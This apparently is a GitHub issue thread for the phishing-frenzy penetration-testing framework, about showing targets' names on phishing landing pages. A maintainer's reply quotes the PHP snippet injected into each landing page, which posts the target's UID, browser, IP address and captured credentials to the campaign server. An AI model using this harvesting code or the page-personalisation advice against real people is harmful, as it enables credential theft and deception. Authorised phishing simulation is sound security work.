phishing-frenzy
Feature Request: Possibility to use firstname, lastname as dynamic fields in php pages
When designing email templates you can use dynamic tags like this: <%= @target.firstname %> <%= @target.lastname %> <%= @target.email_address %>
These dynamic tags don't work anymore in the php landing pages that the user visits. Questions:
- What would be the best or easiest option to also get these uploaded user values available on each PHP page, linked of course with the correct user/UID? So for example, when a user with UID=123456 visits, we can display a PHP page with text that includes his name. Can we not get these user variables loaded in the PHP session?
- Is it possible to extend the user upload fields with 1-3 additional info fields?
The easiest way, at present, is to modify https://github.com/pentestgeek/phishing-frenzy/blob/master/app/controllers/reports_controller.rb#L71 so the finish string contains those values. Then do something in PHP to parse the string and place it in the rest of the document.
That value will be found in the PHP header injected in the top of each file, https://github.com/pentestgeek/phishing-frenzy/blob/e6d13c25e16bab8dd4a5bc987c248258cf4b9891/app/views/reports/tags.txt.erb:
$result = file_get_contents($url, false, $context);
You are probably best off editing the files directly in the public/deployed/campaign_id folder rather than via templates at that stage.
Thanks for your fast answer; I have studied it, but have some questions. It is not clear to me how I can pick up this "finish" string. By default it doesn't seem that it is already present in the HTTP headers. So is it correct to say that I can add some PHP code in each PHP template page that prints out the full $results variable? I prefer to do it in the templates.
The finish string will be retrieved in the PHP snippet injected into every page.
$url = "<%= GlobalSettings.first.site_url %>" . '/reports/results/';
$data = array('uid' => $uid, 'browser_info' => $browser, 'ip_address' => $ip, 'extra' => $creds);

// use key 'http' even if you send the request to https://...
$options = array(
    'http' => array(
        'header' => 'Content-type: application/x-www-form-urlencoded',
        'method' => 'POST',
        'content' => http_build_query($data),
    ),
);
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
$result should equal the contents of the finish string.
You could probably put in PHP tags somewhere in the page to show this: <?php echo $result; ?>
Thanks; just one more: is the 'results' string used for anything? If I add other data as you suggest, will it not mess up something else?